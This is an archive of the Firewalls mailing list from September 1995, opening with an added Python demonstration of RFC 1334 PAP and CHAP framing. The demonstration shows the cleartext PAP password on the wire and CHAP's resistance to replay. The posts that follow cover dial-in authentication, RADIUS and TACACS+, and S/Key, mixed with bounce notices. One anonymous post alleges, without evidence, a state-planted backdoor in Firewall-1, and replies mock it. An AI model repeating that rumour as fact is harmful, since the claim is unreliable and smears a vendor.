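The PAP/CHAP difference David Carrel describes (and the RFC 1334 reference that follows in the thread), worked through as an added example by the editor; it is not part of anyone's message. Both RFC 1334 exchanges are framed as they would travel over the PPP link, with a constructed user table, a constructed authenticator name `nas-2511` and a 16-octet random challenge as assumptions. It shows the password appearing literally in the PAP Authenticate-Request, the CHAP Response carrying only MD5(Identifier || secret || Challenge) so the secret never crosses the line, a captured CHAP Response failing when replayed because each challenge is answerable once, and, in the authenticator class, why CHAP needs the shared secret in the clear on the access server, which is the constraint behind Carrel's remark about token cards.

```python
"""PAP and CHAP (RFC 1334) as they appear on a PPP link: what an eavesdropper on the
dial-up line sees in each case, and why a CHAP response cannot simply be replayed."""
import hashlib
import hmac
import os
import struct

# Constructed user table for the example; peer name -> shared secret.
USERS = {b"laptop1": b"s3cret-pw"}

# ---- PAP: Authenticate-Request (Code 1) carries Peer-ID and Password in cleartext ----
PAP_AUTH_REQ, PAP_ACK, PAP_NAK = 1, 2, 3


def pap_authenticate_request(identifier, peer_id, password):
    """Code | Identifier | Length | Peer-ID-Length | Peer-ID | Passwd-Length | Password"""
    body = bytes([len(peer_id)]) + peer_id + bytes([len(password)]) + password
    return struct.pack("!BBH", PAP_AUTH_REQ, identifier, 4 + len(body)) + body


def pap_authenticator(frame, users):
    """Authenticator side: compare the received password with the stored one."""
    code, identifier, length = struct.unpack("!BBH", frame[:4])
    if code != PAP_AUTH_REQ or length != len(frame):
        return PAP_NAK
    id_len = frame[4]
    peer_id = frame[5:5 + id_len]
    pw_len = frame[5 + id_len]
    password = frame[6 + id_len:6 + id_len + pw_len]
    stored = users.get(peer_id)
    return PAP_ACK if stored is not None and hmac.compare_digest(stored, password) else PAP_NAK


# ---- CHAP: Challenge (1) / Response (2) / Success (3) / Failure (4) ----
CHAP_CHALLENGE, CHAP_RESPONSE, CHAP_SUCCESS, CHAP_FAILURE = 1, 2, 3, 4


def chap_packet(code, identifier, value, name):
    """Code | Identifier | Length | Value-Size | Value | Name"""
    body = bytes([len(value)]) + value + name
    return struct.pack("!BBH", code, identifier, 4 + len(body)) + body


def chap_parse(frame):
    code, identifier, length = struct.unpack("!BBH", frame[:4])
    value_size = frame[4]
    return code, identifier, frame[5:5 + value_size], frame[5 + value_size:length]


def chap_hash(identifier, secret, challenge):
    """RFC 1334: Response Value = MD5(Identifier || secret || Challenge Value)."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class ChapAuthenticator:
    """The access server. It must hold each peer's secret in the clear to compute the
    expected hash; a one-time code that only a separate token server can validate
    cannot take that place, which is the CHAP limitation raised in the thread."""

    def __init__(self, secrets, name=b"nas-2511"):   # name is an assumption for the example
        self.secrets, self.name, self.outstanding = secrets, name, {}

    def challenge(self, identifier):
        value = os.urandom(16)                       # fresh, unpredictable challenge every time
        self.outstanding[identifier] = value
        return chap_packet(CHAP_CHALLENGE, identifier, value, self.name)

    def check(self, frame):
        code, identifier, value, name = chap_parse(frame)
        challenge = self.outstanding.pop(identifier, None)   # a challenge is answerable once
        secret = self.secrets.get(name)
        if code != CHAP_RESPONSE or challenge is None or secret is None:
            return struct.pack("!BBH", CHAP_FAILURE, identifier, 4)
        ok = hmac.compare_digest(chap_hash(identifier, secret, challenge), value)
        return struct.pack("!BBH", CHAP_SUCCESS if ok else CHAP_FAILURE, identifier, 4)


def chap_peer_response(challenge_frame, name, secret):
    """The dial-in peer: hash the challenge with its secret; the secret itself never leaves."""
    code, identifier, value, _ = chap_parse(challenge_frame)
    if code != CHAP_CHALLENGE:
        raise ValueError("not a CHAP Challenge")
    return chap_packet(CHAP_RESPONSE, identifier, chap_hash(identifier, secret, value), name)


def demo(users=USERS):
    """Run both exchanges and report what the wire carried and how the authenticator ruled."""
    name, secret = next(iter(users.items()))
    pap_frame = pap_authenticate_request(7, name, secret)
    nas = ChapAuthenticator(users)
    challenge = nas.challenge(1)
    response = chap_peer_response(challenge, name, secret)
    verdict = nas.check(response)
    replay = nas.check(response)        # captured response sent again: its challenge is gone
    return {
        "pap_result": pap_authenticator(pap_frame, users),
        "pap_secret_on_wire": secret in pap_frame,
        "chap_secret_on_wire": secret in challenge + response,
        "chap_result": verdict[0],
        "chap_replay_result": replay[0],
    }


if __name__ == "__main__":
    print(demo())
```

The two `*_secret_on_wire` results are the whole argument against PAP with fixed passwords on a dial-up line; the replay result is what the challenge buys you over a static credential. Note that a CHAP secret held on the authenticator is still a secret worth protecting, which is where a separate authentication server (TACACS+, RADIUS) comes in.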
Dave ---------------------------------------------------------------------------- David Carrel | E-mail: carrel@cisco.com Security Development, cisco Systems | phone: (408) 526-5207 210 W. Tasman Drive | fax: (408) 526-4952 San Jose, CA 95134-1706 | ---------------------------------------------------------------------------- > I have been sent a proposal from a vendor who wishes to allow remote > access to a sent using a Cisco 2511 on the LAN. > > They want to allow a laptop using PPP dialin to a Cisco 2511 with a remote > access port and use the PAP protocol which they claim will take care of > security. They claim this can't be hacked.>:-() > > Their proposal claims that a remote user dialing in with PPP would have > to know the 2511 port IP address and then issue an authentication string > via PAP(?) which provides security. > > My opinion is, no, you want remote access, you go through an authentication > server and use a Security Dynamics card. > > What the heck is this PAP stuff and how much of a potential mess is this?
> > TIA, > > Chris N > From firewalls-owner Thu Sep 7 10:00:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA19169 for firewalls-outgoing; Thu, 7 Sep 1995 09:36:20 -0700 Received: from condor.messaging.cs.mci.com ([166.37.39.95]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA19162 for ; Thu, 7 Sep 1995 09:36:15 -0700 Received: by condor.messaging.cs.mci.com; id AB29293; Thu, 7 Sep 1995 10:32:24 -0600 Date: Thu, 7 Sep 1995 10:32:24 -0600 From: Mail Delivery Subsystem Subject: Returned mail: Unable to deliver mail Message-Id: <9509071632.AB29293@condor.messaging.cs.mci.com> To: Firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Thu Sep 7 10:31:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA20252 for firewalls-outgoing; Thu, 7 Sep 1995 10:22:00 -0700 Received: from sunthing.sjsinc.com (sunthing.sjsinc.com [140.174.165.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA20237 for ; Thu, 7 Sep 1995 10:21:54 -0700 Received: by sunthing.sjsinc.com Mailer: sendmail (8.6.12/8.6.9) Protocol: Id: KAA23295; Thu, 7 Sep 1995 10:19:46 -0700 Date: Thu, 7 Sep 1995 10:19:46 -0700 From: sjs@sunthing.sjsinc.com (Stefan Jon Silverman) Message-Id: <199509071719.KAA23295@sjsinc.com> To: gaarder@actech.com Subject: Re: SLIP/PPP dialin on firewall? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steven Gaarder writes: > > I am setting up Internet connections for our company's various offices > using firewalls built from BSD/OS and the TIS firewall toolkit. I want > to add a modem-based backup link so that the firewalls can communicate > with each other if an Internet link goes down. To do this, I am > thinking of installing a modem for SLIP or PPP on the firewall machine, > and disabling any logins other than to the PPP/SLIP software. 
It seems > to me that as long as I treat a SLIP/PPP connection the same as one from > the Internet, I am not reducing security significantly. Am I missing > anything? > My only comments here would be to use the mgetty portion of mgetty+sendfax (ftp://sunsite.unc.edu) to control the port. It allows a degree of modem port control that is not usually available in that it can restrict access to certain logins, certain phone numbers (if your modems and telco support Caller-ID), will launch programs based on user ID's (which can be a script to verify that the Internet connection is down before accepting a call), and many other features. Just remember to launch it from your /etc/ttytab file with the data-only flag, and watch the log files -- they grow very fast... My $0.03 worth (inflation has upped the value of advice).... Regards, b c++'ing u, %-) sjs ------------------------------------------------------------------------------- Stefan Jon Silverman - President SJS Associates, N.A., Inc. 572 Chestnut Street Distributed Systems Architecture & Implementation San Francisco, Ca. 94133 Phone: 415 989 2741 Fax: 415 989 7250 E-mail: sjs@sjsinc.com Cell: 415 519 3494 ------------------------------------------------------------------------------- Weebles wobble, but they don't fall down!!! 
-------------------------------------------------------------------------------

From firewalls-owner Thu Sep 7 11:15:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA20969 for firewalls-outgoing; Thu, 7 Sep 1995 10:58:07 -0700 Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA20955 for ; Thu, 7 Sep 1995 10:57:57 -0700 Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA14895; Thu, 7 Sep 95 13:16:28 CDT Received: by mnbp.network.com with Microsoft Mail id <304F3195@mnbp.network.com>; Thu, 07 Sep 95 12:53:25 CDT From: Craig McLellan To: firewalls Subject: Looking for firm information Date: Thu, 07 Sep 95 12:52:00 CDT Message-Id: <304F3195@mnbp.network.com> Encoding: 8 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anyone on this list heard of the consulting firm Peter Davis and Associates? Apparently they present themselves as one of the leading security consulting firms in North America. Any feedback?
RGRDS....clm

From firewalls-owner Thu Sep 7 12:00:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA21926 for firewalls-outgoing; Thu, 7 Sep 1995 11:26:03 -0700 Received: from freeside.fc.net (freeside.fc.net [198.6.198.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA21917 for ; Thu, 7 Sep 1995 11:25:56 -0700 Received: (from jerry@localhost) by freeside.fc.net (8.6.12/8.6.6) id NAA07276; Thu, 7 Sep 1995 13:22:58 -0500 From: Jeremy Porter Message-Id: <199509071822.NAA07276@freeside.fc.net> Subject: Re: Comparison RADIUS and TACACS+ To: frimp@mms.mms-gmbh.de Date: Thu, 7 Sep 1995 13:22:57 -0500 (CDT) Cc: portmaster-users@livingston.com, firewalls@greatcircle.com In-Reply-To: from "Frank Heinzius" at Sep 7, 95 03:43:15 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1107 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >Hi all! > >Does anybody have a comparison between the features of RADIUS and >TACACS+? A feature table comparison would be perfect. > >I have customers who want to buy a Cisco Access Server, I want to >sell them Livingston PortMasters. Despite this, Cisco and Livingston >announced that they would integrate each other's features into their >machines. Why not wait until you can buy a product that does both RADIUS and TACACS+? I understand there are people working on such things, in addition to Cisco's announced support for RADIUS. Supposedly all the free TACACS servers suck. I've never been forced to use one, because Cisco Access servers have such a tiny port density. (Although Cisco's will support OSPF and classless operation which Livingston's don't.) -- ------ Freeside Communications, Inc. Texas's ISDN leader. ------ --- (512)-339-6094 P.O.
Box 530264 Austin, TX 78753 --- ------ (sales: sales@fc.net, pricing: info@fc.net) ------ --------- jerry@fc.net ---------------------------------------- ------------ High Speed, Fault-tolerant Networking -------------- From firewalls-owner Thu Sep 7 12:10:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA22592 for firewalls-outgoing; Thu, 7 Sep 1995 11:46:47 -0700 Received: from hosaka.smallworks.com (hosaka.SmallWorks.COM [192.207.126.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA22585 for ; Thu, 7 Sep 1995 11:46:44 -0700 Received: by hosaka.smallworks.com (5.x/SMI-SVR4) id AA25370; Thu, 7 Sep 1995 13:45:16 -0500 Date: Thu, 7 Sep 1995 13:45:16 -0500 From: jim@SmallWorks.COM (Jim Thompson) Message-Id: <9509071845.AA25370@hosaka.smallworks.com> To: firewalls@GreatCircle.COM, taft!nicholcs@uustar.starnet.net Subject: Re: Cisco 2511s Sender: firewalls-owner@GreatCircle.COM Precedence: bulk PAP (Password Authentication Protocol) is described in RFC1334, along with CHAP (Challenge Handshake Authentication Protocol). PAP is not a strong authentication method, CHAP is somewhat better. You can even use Security Dynamics cards via xtacacs and TACACS+, both of which the Cisco can 'speak' with great fluency. Jim From firewalls-owner Thu Sep 7 12:32:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA23935 for firewalls-outgoing; Thu, 7 Sep 1995 12:22:21 -0700 Received: from devel.dejong.com (devel.dejong.com [198.235.24.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA23928 for ; Thu, 7 Sep 1995 12:22:10 -0700 From: Chris Tyler To: Firewalls@GreatCircle.COM Date: Thu, 7 Sep 1995 15:20 EDT Subject: Re: SNA through firewalls? 
Content-Length: 705 Content-Type: text/plain Message-ID: <304f46160.257e@devel.dejong.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I'm kind of new to this with firewalls so the question might be a bit > strange, but suppose you have an AS400 behind a firewall that wants to > talk to another on the outside. Are there any commercial firewalls that > can talk SNA, or is there need for some sort of "converter" between > TCP/IP and SNA. Any suggestions would be very grateful. AS400's can directly speak TCP/IP now, and that's the approach that you'll probably want to use. Any good TCP/IP firewalling solution will work in that environment (although I don't know about proxying TN5250 :-). Chris Tyler chris@dejong.com Systems Development Manager, Wm. De Jong Enterprises Inc. +1-519-424-9007 / fax +1-519-424-2399 From firewalls-owner Thu Sep 7 15:00:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA27719 for firewalls-outgoing; Thu, 7 Sep 1995 14:41:43 -0700 Received: from utopia.hacktic.nl (utopia.hacktic.nl [194.109.9.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA27705 for ; Thu, 7 Sep 1995 14:41:39 -0700 Received: (from replay@localhost) by utopia.hacktic.nl (8.6.12/8.6.12) id XAA16451 for firewalls@greatcircle.com; Thu, 7 Sep 1995 23:40:07 +0200 Date: Thu, 7 Sep 1995 23:40:07 +0200 Message-Id: <199509072140.XAA16451@utopia.hacktic.nl> Subject: Firewall-1 concerns To: firewalls@greatcircle.com From: nobody@REPLAY.COM (Anonymous) Organization: RePLaY aND CoMPaNY UnLimited XComm: Replay may or may not approve of the content of this posting XComm: Report misuse of this automated service to Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I recently found out that the Firewall-1 product from Sun is actually written and developed by a company in Israel and that Sun does not have nor has access to the source code. 
I'm afraid that companies may look at the Sun firewall-1 product and think that Sun has inspected the code for trapdoor and such in the code that may have put there under orders from the Masad. In fact, I heard one person say that in looking at the binary there is very suspicious code. It turns out that Sun does not have the source and hasn't inspected it. hope that the US military and other sensitive agencies or companies with sensitive information aren't using this product for protection. It may be that the Masad has free reign to get into you network! Someone very concerned From firewalls-owner Thu Sep 7 15:30:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA28287 for firewalls-outgoing; Thu, 7 Sep 1995 15:10:00 -0700 Received: from gatepas.gc.ca (gatepas.gc.ca [192.197.79.133]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA28280 for ; Thu, 7 Sep 1995 15:09:57 -0700 Reply-To: Peter.BEAN@ldn01.x400.gc.ca Date: Thu, 07 Sep 1995 19:20:01 +0000 Priority: normal Content-Identifier: OLIVETTI-MAIL3.0 X400-Content-Type: P2-1984 X400-MTS-Identifier: [/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/;979:950907192001] From: Peter.BEAN@ldn01.x400.gc.ca (BEAN Peter -LDN -AG -LES) To: Firewalls@GreatCircle.COM Subject: Firewalls-Digest V4 #516 Message-Id: <979*/G=Peter/S=BEAN/O=ldn.01/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/@MHS> Importance: normal In-Reply-To: <199509071531.IAA17353*/DD.RFC-822=miles.greatcircle.com/PRMD=gc+internet/ADMD=GOVMT.CANADA/C=CA/@MHS> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am away from the office until Monday, 18 September 1995 From firewalls-owner Thu Sep 7 16:32:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA29406 for firewalls-outgoing; Thu, 7 Sep 1995 16:03:07 -0700 Received: from ncrhub1.ATTGIS.COM (h192-127-251-16.ATTGIS.COM [192.127.251.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA29399 
for ; Thu, 7 Sep 1995 16:03:01 -0700 From: postmaster@uf9392uc.rockvillemd.NCR.COM Received: from ncrgw1 by ncrhub1.ATTGIS.COM id gc19077; 7 Sep 95 19:00 EDT Received: by ncrgw1.ATTGIS.COM; 4 Sep 95 03:10:09 EDT Received: by ncrhub4.ATTGIS.COM; 4 Sep 95 03:09:37 EDT Received: by uf9392uc.RockvilleMD.ncr.com; 4 Sep 95 03:05:24 EDT Subject: MMUG mail warning Date: Mon, 4 Sep 95 03:10:00 EDT Message-ID: <9509071900.gc19077@ncrhub1.ATTGIS.COM> Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Your mail to peacew@uf9392p01.RockvilleMD.ncr.com is not yet delivered. Delivery attempts continue. ---------- diagnosis ---------- Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. ---------- unsent mail ---------- Received: by uf9392uc.RockvilleMD.ncr.com; 3 Sep 95 01:48:58 EDT Received: by ncrhub4.ATTGIS.COM; 3 Sep 95 01:35:21 EDT Received: by ncrgw1.ATTGIS.COM; 3 Sep 95 01:35:11 EDT Received: from miles.greatcircle.com by relay1.UU.NET with ESMTP id QQzfnx19337; Sun, 3 Sep 1995 01:15:40 -0400 From: firewalls-digest-owner@GreatCircle.COM Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA24562 for firewalls-digest-outgoing; Sat, 2 Sep 1995 22:01:01 -0700 Date: Sat, 2 Sep 1995 22:01:01 -0700 Message-Id: <199509030501.WAA24562@miles.greatcircle.com> To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V4 #513 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@GreatCircle.COM Precedence: bulk Firewalls-Digest Saturday, 2 September 1995 Volume 04 : Number 513 In this issue: snprintf.c and SunOS 5.4 re: snprintf(), SMURF, & Jules Own Version... re: snprintf(), SMURF, & Jules Own Version... Subject: Re: using suns/sunos for gateway host(s) Re: FW: Programming Re: FW: Programming Re: Use of Remote Authentication: tacacs/radius/etc... 
Re: DNS forwarding problem Large-Mixed-OS FW access problem Re: HannaH from SecureWare Inc. RADIUS... Where is it? Large-Mixed-OS FW access problem Frame-Relay Net Connections See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- From: "Kenneth Kron" Date: 1 Sep 1995 19:24:39 -0800 Subject: snprintf.c and SunOS 5.4 Patrick, Thanks for the snprintf source, FYI -- In order to compile your snprintf on SunOS 5.4 I had to From firewalls-owner Thu Sep 7 17:13:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA00680 for firewalls-outgoing; Thu, 7 Sep 1995 16:34:00 -0700 Received: from ncrhub1.ATTGIS.COM (h192-127-251-16.ATTGIS.COM [192.127.251.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA00673 for ; Thu, 7 Sep 1995 16:33:56 -0700 From: postmaster@uf9392uc.rockvillemd.NCR.COM Received: from ncrgw1 by ncrhub1.ATTGIS.COM id bn20545; 7 Sep 95 19:31 EDT Received: by ncrgw1.ATTGIS.COM; 5 Sep 95 03:04:29 EDT Received: by ncrhub4.ATTGIS.COM; 5 Sep 95 03:03:00 EDT Received: by uf9392uc.RockvilleMD.ncr.com; 5 Sep 95 02:59:27 EDT Subject: MMUG mail warning Date: Tue, 5 Sep 95 03:04:00 EDT Message-ID: <9509071931.bn20545@ncrhub1.ATTGIS.COM> Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Your mail to peacew@uf9392p01.RockvilleMD.ncr.com is not yet delivered. Delivery attempts continue. ---------- diagnosis ---------- Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. 
If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. ---------- unsent mail ---------- Received: by uf9392uc.RockvilleMD.ncr.com; 1 Sep 95 23:09:56 EDT Received: by ncrhub4.ATTGIS.COM; 1 Sep 95 22:55:41 EDT Received: by ncrgw1.ATTGIS.COM; 1 Sep 95 22:55:12 EDT Received: from miles.greatcircle.com by relay1.UU.NET with ESMTP id QQzfju15345; Fri, 1 Sep 1995 22:31:37 -0400 From: firewalls-digest-owner@GreatCircle.COM Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA29960 for firewalls-digest-outgoing; Fri, 1 Sep 1995 19:03:40 -0700 Date: Fri, 1 Sep 1995 19:03:40 -0700 Message-Id: <199509020203.TAA29960@miles.greatcircle.com> To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V4 #512 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@GreatCircle.COM Precedence: bulk Firewalls-Digest Friday, 1 September 1995 Volume 04 : Number 512 In this issue: Re: Security Paradigms (was HannaH) Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: Use of Remote Authentication: tacacs/radius/etc... Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: Placement of WWW Server - any thoughts? Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. how to close socket Re: HannaH from SecureWare Inc. Re: DNS forwarding problem linux vs. *bsd for secure networking system Re: DNS forwarding problem snprintf() See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. 
---------------------------------------------------------------------- From: gary@habanero.jmu.edu Date: Fri, 1 Sep 95 14:08:10 -0400 Subject: Re: Security Paradigms (was HannaH) > These people are not "trained", like Topsy they "just happen". WE CANNOT AFFORD > TO TRAIN THEM. We do not have the resources, or the time, or the "lost From firewalls-owner Thu Sep 7 18:00:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA03068 for firewalls-outgoing; Thu, 7 Sep 1995 17:51:48 -0700 Received: from yarrina.connect.com.au (yarrina.connect.com.au [192.189.54.17]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA03061 for ; Thu, 7 Sep 1995 17:51:44 -0700 Received: from suburbia.net (suburbia.apana.org.au [192.188.107.90]) by yarrina.connect.com.au with ESMTP id KAA15506 (8.6.12/IDA-1.6); Fri, 8 Sep 1995 10:50:12 +1000 Received: (proff@localhost) by suburbia.net (8.6.12/Proff-950810) id KAA16123; Fri, 8 Sep 1995 10:50:07 +1000 From: Julian Assange Message-Id: <199509080050.KAA16123@suburbia.net> Subject: Re: Firewall-1 concerns To: nobody@REPLAY.COM (Anonymous) Date: Fri, 8 Sep 1995 10:50:05 +1000 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <199509072140.XAA16451@utopia.hacktic.nl> from "Anonymous" at Sep 7, 95 11:40:07 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 769 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [...] > It turns out that Sun does not have the source and hasn't inspected it. > hope that the US military and other sensitive agencies or companies > with sensitive information aren't using this product for protection. > > It may be that the Masad has free reign to get into you network! > > Someone very concerned Back door? I PROMIS you there is no back door. 
--
+----------------------------------+-----------------------------------------+
| Julian Assange                   | "if you think the United States has     |
|                                  | has stood still, who built the largest  |
| proff@suburbia.net               | shopping centre in the world?" - Nixon  |
+----------------------------------+-----------------------------------------+

From firewalls-owner Thu Sep 7 22:00:09 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA07138 for firewalls-outgoing; Thu, 7 Sep 1995 21:42:56 -0700
Received: from nda.nda.com (fw1.nda.COM [204.57.47.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA07131 for ; Thu, 7 Sep 1995 21:42:54 -0700
Received: (kovar@localhost) by nda.nda.com (8.6.11/8.6.4) id AAA29335; Fri, 8 Sep 1995 00:41:25 -0400
From: David Kovar
Message-Id: <199509080441.AAA29335@nda.nda.com>
Subject: Re: Firewall-1 concerns
To: nobody@REPLAY.COM (Anonymous)
Date: Fri, 8 Sep 1995 00:41:25 -0400 (EDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <199509072140.XAA16451@utopia.hacktic.nl> from "Anonymous" at Sep 7, 95 11:40:07 pm
X-Mailer: ELM [version 2.4 PL20]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 379
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> It turns out that Sun does not have the source and hasn't inspected it.
> I hope that the US military and other sensitive agencies or companies
> with sensitive information aren't using this product for protection.
>
> It may be that the Masad has free rein to get into your network!
>
> Someone very concerned

Someone seriously without a clue, is more like it.
-David

From firewalls-owner Fri Sep 8 00:34:06 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA09967 for firewalls-outgoing; Fri, 8 Sep 1995 00:20:59 -0700
Received: from gate.personal-media.co.jp (gate.personal-media.co.jp [202.33.97.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA09958 for ; Fri, 8 Sep 1995 00:20:55 -0700
Received: (from ishikawa@localhost) by gate.personal-media.co.jp (8.6.12+2.4W3/3.3W5-gate-mx) id QAA14019; Fri, 8 Sep 1995 16:17:25 +0900
Date: Fri, 8 Sep 1995 16:17:25 +0900
From: Chiaki Ishikawa
Message-Id: <199509080717.QAA14019@gate.personal-media.co.jp>
To: Firewalls@GreatCircle.Com
Subject: S/Key for little endian machine
Reply-to: ishikawa@personal-media.co.jp
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

PMC e-mail id: 3958

Hello,

A while ago, someone posted that a version of S/Key that runs correctly on little-endian machines such as the Intel x86 CPU was available on an Australian site. I found that the link to that site is very slow, and the greeting message of the ftp server suggested that I might try another site before downloading it from there.

In order to be nice to the Australian users, I am looking for a site in the USA or possibly in Europe that has the same/similar S/Key source file. Anyone?

This is the original message:

From: "Daniel O'Callaghan"
Date: Thu, 29 Jun 1995 09:32:29 +1000 (EST)
Subject: Re: Has Skey been ported to Linux.

On Wed, 28 Jun 1995, Paul Osterwald wrote:

> I would appreciate this information as well.

Try ftp.austin.unimelb.edu.au:/pub/Security

skey built fine except that the endian-ness was wrong. I added the right flag for endian-ness.

Danny

--
Chiaki Ishikawa ishikawa@personal-media.co.jp
Personal Media Corp.
Shinagawa, Tokyo, Japan 141 From firewalls-owner Fri Sep 8 00:34:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA09981 for firewalls-outgoing; Fri, 8 Sep 1995 00:23:35 -0700 Received: from ncrhub1.ATTGIS.COM (h192-127-251-16.ATTGIS.COM [192.127.251.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA09974 for ; Fri, 8 Sep 1995 00:23:31 -0700 From: postmaster@uf9392uc.rockvillemd.NCR.COM Received: from ncrgw1 by ncrhub1.ATTGIS.COM id ez19031; 7 Sep 95 18:55 EDT Received: by ncrgw1.ATTGIS.COM; 4 Sep 95 02:58:27 EDT Received: by ncrhub4.ATTGIS.COM; 4 Sep 95 02:57:52 EDT Received: by uf9392uc.RockvilleMD.ncr.com; 4 Sep 95 02:55:56 EDT Subject: MMUG mail warning Date: Mon, 4 Sep 95 02:58:00 EDT Message-ID: <9509071855.ez19031@ncrhub1.ATTGIS.COM> Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Your mail to peacew@uf9392p01.RockvilleMD.ncr.com is not yet delivered. Delivery attempts continue. ---------- diagnosis ---------- Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. 
---------- unsent mail ---------- Received: by uf9392uc.RockvilleMD.ncr.com; 1 Sep 95 15:50:40 EDT Received: by ncrhub4.ATTGIS.COM; 1 Sep 95 15:35:41 EDT Received: by ncrgw1.ATTGIS.COM; 1 Sep 95 15:35:21 EDT Received: from miles.greatcircle.com by relay2.UU.NET with ESMTP id QQzfir13657; Fri, 1 Sep 1995 15:27:33 -0400 From: firewalls-digest-owner@GreatCircle.COM Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09371 for firewalls-digest-outgoing; Fri, 1 Sep 1995 11:37:45 -0700 Date: Fri, 1 Sep 1995 11:37:45 -0700 Message-Id: <199509011837.LAA09371@miles.greatcircle.com> To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V4 #511 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@GreatCircle.COM Precedence: bulk Firewalls-Digest Friday, 1 September 1995 Volume 04 : Number 511 In this issue: Re: HannaH from SecureWare Inc. Re: comparison study between DES and RSA Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: FW: Programming Re: HannaH from SecureWare Inc. Security Paradigms (was HannaH) Firewall Requirements Document Re: comparison study between DES and RSA Re: HannaH from 